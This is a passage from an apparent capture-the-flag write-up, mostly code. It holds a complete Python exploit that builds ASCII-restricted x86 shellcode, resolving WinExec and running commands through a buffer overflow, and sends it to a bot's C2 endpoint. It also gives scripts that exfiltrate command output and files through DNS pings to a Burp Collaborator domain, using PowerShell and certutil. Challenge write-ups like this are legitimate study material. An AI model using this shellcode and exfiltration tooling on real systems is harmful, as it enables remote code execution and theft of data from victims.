                first_instructions.append("push eax;")
            elif (rev_hex_payload_len % 8 == 4):
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push eax;")
            else:
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
                first_instructions.append("push eax;")
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push ax;")
            null_terminated = True
            
    instructions = first_instructions + instructions
    asm_instructions = "".join(instructions)
    return asm_instructions


def ascii_shellcode(breakpoint=0):
    command = "calc"
    if len(command) > 76:
        exit(1)
    command += " " * (76 - len(command)) # amount of padding available
    asm = [
        # at start, eax, esi, edi are nulled
        "   start:                               ",
        f"{['', 'int3;'][breakpoint]}            ",
        "       pop     edx ;",
        "       pop     edx ;",                                     # Pointer to shellcode in edx
        "       xor     al, 0x7f;",                                 # inc eax to 0x80 which xors out the ones that are out of reach
        "       inc     eax;",
        "       xor     dword ptr [edx+0x6e], eax;",                # correct ff d7 call   edi
        "       xor     dword ptr [edx+0x6f], eax;",                # correct ff d7 call   edi
        "       push    0x7f;",                                     # dont need ebx, use eax
        "       pop     ebx;",
        "       xor     dword ptr [edx+ebx+0x24], eax;",            # correct ad lods   eax,dword ptr ds:[esi]
        "       xor     dword ptr [edx+ebx+0x29], eax;",            # correct 75 ed jne    0x68
        "       push    0x7f;",
        "       add     ebx, dword ptr [esp];",
        "       xor     dword ptr [edx+ebx+0x27], eax;",            # correct ff d7 call   edi    msiexec
        "       xor     dword ptr [edx+ebx+0x28], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",            # correct ff d7 call   edi
        "       push    0x53736046;",                               # 60 should xor with 80 to get e0
        "       pop     ebx;",                                      # IAT address pointer to GetModuleHandle in ebx
        "       push    0x01014001;",
        "       add     ebx, dword ptr [esp];",
        "       add     ebx, dword ptr [esp];",
        "       push    0x01010101;",                               # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
        "       pop     eax;",                                      # use eax to xor for null bytes in wide string
        "       xor     edi, dword ptr [ebx];",                     # dereference IAT, get GetModuleHandle in edi       
        "       push    esi;",                                      # nulls for end of wide string
        "       push    0x01330132;",                               # push widestring "kernel32" onto stack
        "       xor     dword ptr [esp], eax;",
        "       push    0x016d0164;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x016f0173;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x0164016a;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    esp;",
        "       call    edi;",                                      # call GetModuleHandle(&"kernel32")
        "       push    eax;",                                      # Kernel32 base address in eax
        "       pop     edi;",
        "       push    esi;",                                      # null bytes
        "       pop     ebx;",                                  
        "       xor     ebx, dword ptr [edi + 0x3C];",              # ebx = [kernel32 + 0x3C] = offset(PE header)
        "       push    ebx;",                                      # null out bytes on top of stack
        "       xor     ebx, dword ptr [esp];",
        "       pop     eax;",
        "       xor     ebx, dword ptr [edi + eax + 0x78];",        # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
        "       xor     esi, dword ptr [edi + ebx + 0x20];",        # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                     # esi = kernel32 + offset(names table) = &(names table)
        "       xor     dword ptr [esp], edi;",                     # null out bytes on top of stack
        "       pop     edx;",
        "       xor     edx, [edi + ebx + 0x24];",                  # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
        push_string("WinE"),
        "       pop     ecx;",                                      # ecx = 'WinE'
        "   find_winexec_x86:",
        "       push    ebp;",
        "       xor     dword ptr [esp], ebp;",                     # null out bytes on top of stack
        "       AND     ebp, dword ptr [esp];",                     # nulls out ebp for xor operation
        "       xor     BP, WORD ptr [edi + edx];",                 # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
        "       INC     edx;",
        "       INC     edx;",                                      # edx = offset += 2
        "       lodsd;",                                            # eax = &(names table[function number]) = offset(function name)
        "       CMP     [edi + eax], ecx;",                         # *(DWORD*)(function name) == "WinE" ?
        "       JNE     find_winexec_x86;",
        "       pop     esi;",
        "       xor     esi, dword ptr [edi + ebx + 0x1C];",        # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                     # esi = kernel32 + offset(address table) = &(address table)
        "       push    ebp;",
        "       add     ebp, dword ptr [esp];",
        "       add     edi, [esi + ebp * 2];",                     # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
        "       push    0x31;",                                     # null out eax
        "       pop     eax;",
        "       xor     al, 0x31;",
        "       push    eax;",
        push_string(command),                                       # set up args for WinExec
        "       push    esp;",
        "       pop     ebx;",
        "       inc     eax;",
        "       push    eax;",
        "       push    ebx;",
        "       inc     ecx;",                                      # NOP
        "       inc     ecx;",                                      # NOP
        "       CALL    edi;",                                      # WinExec(&("calc"), 1);
        # If you like graceful exits
        # "       push   0x53736016;",                            
        # "       pop    ebx;",                                       
        # "       push 0x01014001;",
        # "       add ebx, dword ptr [esp];",
        # "       add ebx, dword ptr [esp];",                         # ebx = IAT address pointer to TerminateProcess
        # "       push eax;",                                     
        # "       xor     eax, dword ptr [esp];",                     # uExitCode = 0
        # "       push    eax;",
        # "       and     edi, dword ptr [esp];",                     # null out edi
        # "       xor    edi, dword ptr [ebx];",                      # edi = *TerminateProcess
        # "       dec eax;",                                          # hProcess = 0xFFFFFFFF
        # "       push eax;",
        # "       inc ecx;",                                          # NOP
        # "       call edi;",                                         # TerminateProcess(0xFFFFFFFF, 0)
    ]
    return "\n".join(asm)


def main(args):
    shellcode = ascii_shellcode( args.debug_break)

    eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
    encoding, _ = eng.asm(shellcode)

    url_encoded_payload = ""
    payload = b'UwU'                                        # magic bytes
    payload += b'A' * 29                                    # offset
    payload += pack("<L", (0x41410679))                     # jns    0x8
    payload += pack("<L", (0x55756e78))                     # pop ebx ; pop ebp ; retn 0x0004
    payload += bytes(encoding)                              # shellcode
    payload += b"A" * (328 - len(payload))                  # filler
    for enc in payload:
        url_encoded_payload += "%{0:02x}".format(enc)

    print("url_encoded_payload = " + url_encoded_payload
        .replace("%ff%d7", "%7f%57")
        .replace("%8b","%0b")
        .replace("%fe","%7e")
        .replace("%b7","%37")
        .replace("%ad","%2d")
        .replace("%ee","%6e")
        .replace("%ae","%2e")
        .replace("%ed", "%6d"))


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Creates shellcodes compatible with the OSED lab VM"
    )

    parser.add_argument(
        "-d",
        "--debug-break",
        help="add a software breakpoint as the first shellcode instruction",
        action="store_true",
    )

    args = parser.parse_args()

    main(args)
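
The replace chain at the end of the script works because each substituted byte differs from the original only in its top bit (0xff becomes 0x7f, 0xd7 becomes 0x57, and so on), and the xor instructions at the start of the shellcode flip that bit back in memory once eax holds 0x80. The sketch below shows the idea in isolation. The helpers mask_high_bytes and restore_high_bytes are hypothetical and not part of the script above, and they mask every byte from 0x80 upwards rather than only the specific bytes the script replaces.

```python
def mask_high_bytes(shellcode):
    """Clear the top bit of every byte >= 0x80 and record where that happened."""
    masked = bytearray(shellcode)
    patched_offsets = []
    for offset, value in enumerate(masked):
        if value >= 0x80:
            masked[offset] = value ^ 0x80
            patched_offsets.append(offset)
    return bytes(masked), patched_offsets


def restore_high_bytes(masked, patched_offsets):
    """Simulate the run-time fix-up: XOR each recorded byte with 0x80 again."""
    restored = bytearray(masked)
    for offset in patched_offsets:
        # Comparable to `xor dword ptr [edx+offset], eax` with eax = 0x80,
        # which only changes the lowest byte of the dword at that address.
        restored[offset] ^= 0x80
    return bytes(restored)


if __name__ == "__main__":
    call_edi = b"\xff\xd7"                        # call edi
    masked, offsets = mask_high_bytes(call_edi)
    print(masked.hex(), offsets)                  # bytes that are sent over the wire
    print(restore_high_bytes(masked, offsets).hex())
```

Each recorded offset corresponds to one xor instruction in the decoder stub, which is why the stub grows with the number of high bytes in the shellcode.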

This time, I had enough bytes to run a ping <BURP COLLABORATOR DOMAIN> command on the bot masters. Thankfully, I got a pingback!

DNS Ping

I excitedly began trying other payloads like remote PowerShell script execution, msiexec, and more. However, despite my many attempts, nothing reached my server other than the DNS requests. With a growing sense of dread, I came to terms with what this meant: the challenge expected me to use DNS exfiltration. I confirmed this by sending a series of commands like powershell Add-Content test spaceraccoon, powershell Add-Content test .<BURP COLLABORATOR URL>, and powershell "ping $(type test)", which resulted in a DNS pingback at spaceraccoon.<BURP COLLABORATOR DOMAIN>.

DNS Write File

While there was good news – I could write to arbitrary files – this further confirmed that DNS exfiltration was the way to go. I began writing a script to automate this exfiltration. To retrieve the outputs of commands, I wrote the output of the command to a working file, then appended my burpcollaborator domain. Next, I replaced any non-DNS-compatible characters using PowerShell. Finally, I pinged the concatenated domain in the file and hopefully retrieved the output.
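
To make the "non-DNS-compatible characters" constraint concrete, here is a rough local check that could be run on a candidate hostname before sending it. It is only a sketch: dns_problems is a hypothetical helper, abc123 stands in for a real Collaborator ID, and the rules are the usual hostname conventions (letters, digits and hyphens only, no empty labels, at most 63 characters per label and 253 for the whole name).

```python
import re

MAX_LABEL_LENGTH = 63     # DNS limit for a single label
MAX_NAME_LENGTH = 253     # practical limit for the full dotted name
LABEL_PATTERN = re.compile(r"[A-Za-z0-9-]+")


def dns_problems(hostname):
    """Return a list of reasons why hostname would not resolve cleanly."""
    problems = []
    if len(hostname) > MAX_NAME_LENGTH:
        problems.append("name longer than {} characters".format(MAX_NAME_LENGTH))
    for label in hostname.split("."):
        if label == "":
            problems.append("empty label (two consecutive dots)")
        elif len(label) > MAX_LABEL_LENGTH:
            problems.append("label longer than {} characters".format(MAX_LABEL_LENGTH))
        elif not LABEL_PATTERN.fullmatch(label):
            problems.append("invalid characters in label {!r}".format(label))
    return problems


if __name__ == "__main__":
    # abc123 is a placeholder Collaborator ID, not a real instance
    print(dns_problems("C--Users-Administrator.abc123.burpcollaborator.net"))
    print(dns_problems("C:\\Users.abc123.burpcollaborator.net"))
```

The 63-character label limit is also why small blocks are a sensible choice when exfiltrating longer data this way.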

For example, to retrieve the current working directory, I ran:

def exfil_working_file():
    send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
    send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
    send_command("powershell ping $(type {})".format(WORKING_FILE))
    delete_file(WORKING_FILE)

def get_pwd():
    send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

I got a pingback at C--Users-Administrator-AppData-LocalLow.<BURP COLLABORATOR DOMAIN>, which I converted back to C:\Users\Administrator\AppData\LocalLow.
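
The conversion back can be sketched as follows. decode_pwd_label is a hypothetical helper, and the mapping is lossy because get_pwd turns both ':' and '\' into '-', so the sketch assumes a single-letter drive followed by "--" and no hyphens or dots in the real folder names.

```python
def decode_pwd_label(label):
    """Undo the substitutions made by get_pwd() on a received subdomain prefix."""
    drive, separator, rest = label.partition("--")
    if not separator or len(drive) != 1:
        raise ValueError("expected a prefix like 'C--Users-...'")
    # '-' stood in for a backslash and '.' for a space
    return drive + ":\\" + rest.replace("-", "\\").replace(".", " ")


if __name__ == "__main__":
    print(decode_pwd_label("C--Users-Administrator-AppData-LocalLow"))
```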

Since the master bots included the special UwU.exe instances with the flag, I aimed to locate and exfiltrate it. I began enumerating the files in the current working directory with:

def get_file_name(index):
    send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
    send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

This leaked the file names Microsoft, Temp, and 1_run_uwu1.bat. The last one seemed interesting. To exfiltrate files, I first converted them to base64 using certutil and a special undocumented option. I then replaced the incompatible base64 characters + and / with - and . respectively. Unfortunately, I could not use + directly in my commands since \x2b was a bad character, so I replaced it with the functionally-equivalent [char]43. I also removed any trailing = characters. Next, I exfiltrated the file in blocks of 50 base64 characters at a time. To ensure that I got the blocks in the correct order, I added the block offset before and after the base64 characters as a primitive checksum.

def delete_file(filename):
    send_command('powershell del {}'.format(filename))
    
def get_file_length(filename):
    send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
    exfil_working_file()

def exfil_file(filename):
    base64_file = "e"
    block_size = 50

    # delete base64 file
    delete_file(base64_file)

    # create base64 file
    send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))

    # get base64 file length
    get_file_length(base64_file)
    file_length = int(input("[*] Enter received base64 file length: "))

    # replace non-DNS compliant chars
    send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))


    offset = 0
    while offset < file_length:
        print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
        # Add offset at front and back to prevent .. error and also to ensure that all blocks are received
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        if (offset + block_size) > file_length:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
        else:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        offset += block_size

        exfil_working_file()
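
On the receiving side, the blocks have to be stitched back together. A minimal sketch of that step follows, assuming the received subdomain prefixes were collected by hand into a dictionary keyed by offset. This input format, and the helpers strip_offset and reassemble, are hypothetical, since how the pingbacks were processed is not shown here.

```python
import base64

BLOCK_SIZE = 50  # same block size as exfil_file()


def strip_offset(label, offset):
    """Remove the offset marker that was added to both ends of a block."""
    marker = str(offset)
    if (len(label) < 2 * len(marker)
            or not label.startswith(marker)
            or not label.endswith(marker)):
        raise ValueError("block at offset {} is truncated or corrupted".format(offset))
    return label[len(marker):len(label) - len(marker)]


def reassemble(blocks):
    """Rebuild the original file bytes from {offset: received prefix}."""
    if not blocks:
        raise ValueError("no blocks received")
    expected = range(0, max(blocks) + 1, BLOCK_SIZE)
    missing = [offset for offset in expected if offset not in blocks]
    if missing:
        raise ValueError("missing blocks at offsets {}".format(missing))
    encoded = "".join(strip_offset(blocks[offset], offset) for offset in expected)
    # Reverse the DNS-safe substitutions, then restore the stripped padding
    encoded = encoded.replace("-", "+").replace(".", "/")
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded)


if __name__ == "__main__":
    # Simulate what exfil_file() would send for a small file
    original = b"@echo off\r\necho ^1>uwu_cmds.txt\r\n"
    text = base64.b64encode(original).decode().replace("+", "-").replace("/", ".").rstrip("=")
    received = {o: "{}{}{}".format(o, text[o:o + BLOCK_SIZE], o)
                for o in range(0, len(text), BLOCK_SIZE)}
    print(reassemble(received))
```

A missing or damaged offset raises an error naming the block, which can then be requested again on its own.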

After a long wait, I got the contents of 1_run_uwu1.bat.

@echo off
echo ^1>uwu_cmds.txt
echo %c2ip%>>uwu_cmds.txt
echo %c2port%>>uwu_cmds.txt
echo ^3>>uwu_cmds.txt

:loop
type uwu_cmds.txt | C:\Users\Administrator\AppData\LocalLow\cmd.exe /c final_uwu_with_flag.exe
taskkill /im werfault.exe /f
goto loop

Great! I could try exfiltrating final_uwu_with_flag.exe, but my get_file_length function told me that the base64 encoding of final_uwu_with_flag.exe was 989868 bytes long, which would have taken days to exfiltrate. Instead, the contents of 1_run_uwu1.bat gave me an idea – why not pipe inputs to final_uwu_with_flag.exe to execute the “Display Killswitch” option, write the output to a file, then exfiltrate that instead? I could save even more bytes by grepping the output for the TISC{ flag marker.

def exfil_final_uwu():
    delete_file("c")
    delete_file("x")
    delete_file("y")
    send_command("cmd /c \"echo ^4 > c\"")
    send_command("cmd /c \"echo ^5 >> c\"")
    send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
    sleep(3)        # more time to play UwU sound
    send_command("powershell \"Select-String -Path x -Encoding ascii -Pattern TISC|Out-File y\"")       # save more time
    exfil_file("y")
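
To put the "days" estimate for the full executable in numbers, here is a back-of-the-envelope calculation. It assumes the 5-second pause that send_command applies after every request in the full script, and counts seven commands per block (three Add-Content calls in exfil_file plus the four commands issued by exfil_working_file). Network latency is ignored, so this is a lower bound; estimate_exfil_seconds is a hypothetical helper.

```python
import math


def estimate_exfil_seconds(encoded_length, block_size=50,
                           commands_per_block=7, delay_per_command=5):
    """Lower bound on exfiltration time, counting only the fixed sleeps."""
    blocks = math.ceil(encoded_length / block_size)
    return blocks * commands_per_block * delay_per_command


if __name__ == "__main__":
    seconds = estimate_exfil_seconds(989868)
    print("{} seconds, about {:.1f} days".format(seconds, seconds / 86400))
```

Under these assumptions the executable alone would need roughly eight days, whereas a file of a few dozen base64 characters needs only a handful of blocks.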

Without further ado, I started the exfiltration. As each minute ticked by, the base64 strings slowly emerged.

Exfil Flag

Halfway through, I placed the half-finished base64 string into a decoder, and there it was. I had finally reached the end of this insane odyssey. Thankfully, there was no bonus level, so I submitted my flag and got some sleep.

#!/usr/bin/python3
import requests
import keystone as ks
from struct import pack
from time import sleep
# import uuid

def to_hex(s):
    retval = list()
    for char in s:
        retval.append(hex(ord(char)).replace("0x", ""))
    return "".join(retval)


def push_string(input_string):
    rev_hex_payload = str(to_hex(input_string))
    rev_hex_payload_len = len(rev_hex_payload)

    instructions = []
    first_instructions = []
    null_terminated = False
    for i in range(rev_hex_payload_len, 0, -1):
        # add every 4 byte (8 chars) to one push statement
        if ((i != 0) and ((i % 8) == 0)):
            target_bytes = rev_hex_payload[i-8:i]
            instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
        # handle the leftover instructions
        elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
            if (rev_hex_payload_len % 8 == 2):
                first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
                first_instructions.append("push eax;")
            elif (rev_hex_payload_len % 8 == 4):
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push eax;")
            else:
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
                first_instructions.append("push eax;")
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push ax;")
            null_terminated = True
            
    instructions = first_instructions + instructions
    asm_instructions = "".join(instructions)
    return asm_instructions


def ascii_shellcode(command):
    if len(command) > 76:
        print("[-] Command is too long!")
        exit(1)
    padded_command = command + " " * (76 - len(command)) # amount of padding available
    asm = [
        # at start, eax, esi, edi are nulled
        "   start:",
        "       pop     edx;",
        "       pop     edx;",                                  # Pointer to shellcode in edx
        "       xor     al, 0x7f;",                             # inc eax to 0x80 which xors out the ones that are out of reach
        "       inc     eax;",
        "       xor     dword ptr [edx+0x6e], eax;",            # correct ff d7 call   edi
        "       xor     dword ptr [edx+0x6f], eax;",            # correct ff d7 call   edi
        "       push    0x7f;",                                 # dont need ebx, use eax
        "       pop     ebx;",
        "       xor     dword ptr [edx+ebx+0x24], eax;",        # correct ad lods eax,dword ptr ds:[esi]
        "       xor     dword ptr [edx+ebx+0x29], eax;",        # correct 75 ed jne    0x68
        "       push    0x7f;",
        "       add     ebx, dword ptr [esp];",
        "       xor     dword ptr [edx+ebx+0x27], eax;",        # correct ff d7 call   edi 
        "       xor     dword ptr [edx+ebx+0x28], eax;",        # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",        # correct ff d7 call   edi
        "       xor     dword ptr [edx+ebx+0x7f], eax;",        # correct ff d7 call   edi
        "       push    0x53736046;",                           # 60 should xor with 80 to get e0
        "       pop     ebx;",                                  # IAT address pointer to GetModuleHandle in ebx
        "       push 0x01014001;",
        "       add ebx, dword ptr [esp];",
        "       add ebx, dword ptr [esp];",
        "       push    0x01010101;",                           # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
        "       pop     eax;",                                  # use eax to xor for null bytes in wide string
        "       xor     edi, dword ptr [ebx];",                 # dereference IAT, get GetModuleHandle in edi       
        "       push    esi;",                                  # nulls for end of wide string
        "       push    0x01330132;",                           # push widestring "kernel32"
        "       xor     dword ptr [esp], eax;",
        "       push    0x016d0164;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x016f0173;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    0x0164016a;",                   
        "       xor     dword ptr [esp], eax;",
        "       push    esp;",
        "       call    edi;",                                  # call GetModuleHandleW(&"kernel32")
        "       push    eax;",                                  # Kernel32 base address in eax
        "       pop     edi;",
        "       push    esi;",                                  # null bytes
        "       pop     ebx;",
        "       xor     ebx, dword ptr [edi + 0x3C];",          # ebx = [kernel32 + 0x3C] = offset(PE header)
        "       push    ebx;",                                  # null out bytes on top of stack
        "       xor     ebx, dword ptr [esp];",
        "       pop     eax;",
        "       xor     ebx, dword ptr [edi + eax + 0x78];",    # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
        "       xor     esi, dword ptr [edi + ebx + 0x20];",    # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                 # esi = kernel32 + offset(names table) = &(names table)
        "       xor     dword ptr [esp], edi;",                 # null out value on stack
        "       pop     edx             ;",         
        "       xor     edx, [edi + ebx + 0x24];",              # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
        push_string("WinE"),
        "       pop ecx;",                                      # ecx = 'WinE'
        "   find_winexec_x86:",
        "       push    ebp;",
        "       xor     dword ptr [esp], ebp;",                 # null out bytes on top of stack
        "       and     ebp, dword ptr [esp];",                 # nulls out ebp for xor operation
        "       xor     BP, WORD ptr [edi + edx];",             # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
        "       inc     edx;",
        "       inc     edx;",                                  # edx = offset += 2
        "       lodsd;",                                        # eax = &(names table[function number]) = offset(function name)
        "       cmp     [edi + eax], ecx;",                     # *(dword*)(function name) == "WinE" ?
        "       jne     find_winexec_x86;",
        "       pop     esi;",
        "       xor     esi, dword ptr [edi + ebx + 0x1C];",    # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)
        "       push    edi;",
        "       add     esi, dword ptr [esp];",                 # esi = kernel32 + offset(address table) = &(address table)
        "       push    ebp;",
        "       add     ebp, dword ptr [esp];",
        "       add     edi, [esi + ebp * 2];",                 # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
        "       push    0x31;",                                 # null out eax
        "       pop     eax;",
        "       xor     al, 0x31;",
        "       push    eax;",                                  # nulls
        push_string(padded_command),                            # set up args for WinExec
        "       push    esp;",
        "       pop     ebx;",
        "       inc     eax;",
        "       push    eax;",
        "       push    ebx;",
        "       inc     ecx;",                                  # NOP
        "       inc     ecx;",                                  # NOP
        "       call    edi;",                                  # WinExec(&("calc"), 1);
    ]
    return "\n".join(asm)

# o2r7vffpq263v6rrjsyxq4xp7gd61v.burpcollaborator.net
COLLABORATOR_INSTANCE = "o2r7vffpq263v6rrjsyxq4xp7gd61v"
FILE_NAME = "1_run_uwu1.bat"
BANNED_CHARS = ['%', '&', '+']
C2_URL = 'http://<IP ADDRESS>:18080/send.php'
TARGET_UWUID = '715cf1a6-51de-4a55-be11-c0ffeec0ffee'
WORKING_FILE = 'l'


def send_command(command):
    for banned_char in BANNED_CHARS:
        if banned_char in command:
            print("Banned chars detected in command!")
            exit(1)

    print("[+] Sending command: {}".format(command))

    shellcode = ascii_shellcode(command)
    eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
    encoding, _ = eng.asm(shellcode)
    payload_string = ""
    payload = b'UwU' 
    payload += b'A' * 29 
    payload += pack("<L", (0x41410679)) + pack("<L", (0x55756e78)) 
    payload += bytes(encoding) 
    payload += b"A" * (328 - len(payload))
    payload = payload.replace(b'\xff\xd7', b'\x7f\x57').replace(b'\x8b', b'\x0b').replace(b'\xfe', b'\x7e').replace(b'\xb7', b'\x37').replace(b'\xad', b'\x2d').replace(b'\xee', b'\x6e').replace(b'\xae', b'\x2e').replace(b'\xed', b'\x6d')
    for enc in payload:
        payload_string += "%{0:02x}".format(enc)

    payload_string = payload_string.replace("%ff%d7", "%7f%57").replace("%8b","%0b").replace("%fe","%7e").replace("%b7","%37").replace("%ad","%2d").replace("%ee","%6e").replace("%ae","%2e").replace("%ed", "%6d")

    headers = {
        'User-Agent': 'UwUserAgent/1.0'
    }

    requests.post(C2_URL, headers=headers, data={'action': 'send', 'a': TARGET_UWUID, 'b': payload})
    sleep(5)

def exfil_working_file():
    send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
    send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
    send_command("powershell ping $(type {})".format(WORKING_FILE))
    delete_file(WORKING_FILE)

def delete_file(filename):
    send_command('powershell del {}'.format(filename))
    
def get_file_length(filename):
    send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
    exfil_working_file()

def exfil_file(filename):
    base64_file = "e"
    block_size = 50

    # delete base64 file
    delete_file(base64_file)

    # create base64 file
    send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))

    # get base64 file length
    get_file_length(base64_file)
    file_length = int(input("[*] Enter received base64 file length: "))

    # replace non-DNS compliant chars
    send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))

    offset = 0
    while offset < file_length:
        print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
        # Add offset at front and back to prevent .. error and also to ensure that all blocks are received
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        if (offset + block_size) > file_length:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
        else:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        offset += block_size

        exfil_working_file()

# if any blocks were dropped previously
def exfil_lost_block(filename, offset, length):
    print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
    send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
    send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, filename, offset, length))
    send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
    exfil_working_file()

# MicrosoftWindowsVersion10.0.14393
def get_version():
    version_file = 'v'
    send_command("cmd /c \"ver > {}\"".format(version_file))
    send_command("powershell \"(Get-Content {}).replace(' ', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {}).replace('[', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {}).replace(']', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {})[1] | Set-Content {} -NoNewLine\"".format(version_file, version_file))
    send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, version_file))
    exfil_working_file()

# ec2amaz-9ri345e\administrator
def get_user():
    user_file = 'v'
    send_command("cmd /c \"whoami > {}\"".format(user_file))
    send_command("powershell \"(Get-Content {}).replace('\\', '') | Set-Content {} -NoNewLine\"".format(user_file, user_file))
    send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, user_file))
    exfil_working_file()

# C:\Users\Administrator\AppData\LocalLow
def get_pwd():
    send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()

# Microsoft
# Temp
# 1_run_uwu1.bat
